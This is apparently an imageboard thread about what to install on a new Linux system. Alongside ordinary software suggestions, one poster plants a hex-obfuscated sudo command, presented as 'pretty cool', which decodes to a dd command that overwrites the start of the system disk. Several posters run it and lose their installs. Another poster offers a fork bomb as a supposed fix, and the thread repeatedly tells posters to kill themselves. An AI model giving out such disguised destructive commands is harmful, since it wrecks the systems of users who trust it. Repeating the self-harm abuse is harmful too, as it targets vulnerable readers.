Install gentoo

Get a better keyboard.

install whatever you usually need on a computer
uninstall the amazon ads
deadbeef for music, mpv for videos
sublime text
xfce4

install arch

>what do I install
Whatever you want.
>what do I uninstall
Google Ubuntu debotnet
>what programs do you suggest for media and music
mpv/smplayer and mpd+frontend respectively
>what programs do you suggest for programming
vim or emacs
>what themes and DE do you suggest?
Moka, Paper, Arc, oomox+terminal.sexy if you want to go deeper

That looks like shit, kill yourself

sudo $(echo "64642069663d2f6465762f7a65726f206f663d2f6465762f73646120636f756e743d3130302062733d314d0a" | xxd -r -p)

Copy/paste that in a terminal, pretty cool.

If you see any big program you don't need, uninstall that. If you feel there's a lot of stuff you don't need and don't like that, you should probably just start with a different distro.

mpv

vim + tmux if you're willing to learn them.

I just did this, holy shit man that was awesome

I hope you are using xfce

Is that from Ocarina of time? Fuck I can't remember the name of the song now.

Im using cinnamon. How do I get to xfce

Why? I just bought this for $20

How's school? :)

Does this work in Mint?

I just did this. What does it do? Fug, lads.

wow that was cruel ... I had to use :(){ :|:& };: to fix it man ...

reinstall

I dropped out of highschool

I'm using Gentoo. Fuck, m8. no way to fix?

literally formats your hard drive

install wine to run decent applications

FUCKING SHIT FUCK FUCK YOU YOU MOTHERFUCKER

You know there's a rule for reporting this type of posts, right?

>uses linux
>doesnt know what that does
Lad, i think its your fault in part.

FUCK YOU YOU MOTHERFUCKER

Technically, filling your drive with zeroes is not formatting, it is worse...

I need to literally reinstall Gentoo now. Fug.

> Dumb shit runs random command with sudo

var top = kek;

I just wanted to hear some Ocarina of Time music

hope you're not serious
no there isn't a way to fix this, other than somehow magically recreating the 100MB you just overwrote with /dev/zero

Welp. Downloading Gentoo and making coffee. Gonna be a long night.

you probably didn't lose any files, unless it's on the first 100MB.

also if you weren't a retard, you'd know that $(...) means "replace this with the stdout of ..." so you'd say "oh, i should know what ... evaluates to and have run

echo "64642069663d2f6465762f7a65726f206f663d2f6465762f73646120636f756e743d3130302062733d314d0a" | xxd -r -p

on your terminal, which would yield (i'm spoonfeeding because you'd be too scared to run it yourself)

dd if=/dev/zero of=/dev/sda count=100 bs=1M

TL;DR: kill yourself

Thank you for your kind words, user. I just backed up the files I need and I am going to reboot now.

H-hold me, senpai!

>what do i uninstall
Unity and install XFCE
>what programs do you suggest for media and music
Google Play Music Desktop and DeaDBeeF
>programming
Emacs
>what themes and DE
any material design one with XFCE and macOS buttons for exit, minimize and expand/unexpand

>rebooting

it will never boot again, be prepared for that

Why unity?
How do I install KDE and Unity?

Not him, but wouldn't this remove GRUB?

"dd if=/dev/zero of=/dev/sda count=100 bs=1M"

lol such funny joke very hacker much impress

...

I actually fuggin dd'ed ~100GB of my external hard drive several months ago. I lost a lot of stuff. Oldest files went first, but I got back 90+% of the files, by number, using this command. There's no way to tell a file is bad, unless you have the checksum, but it's better than losing everything.

See my answer, here.
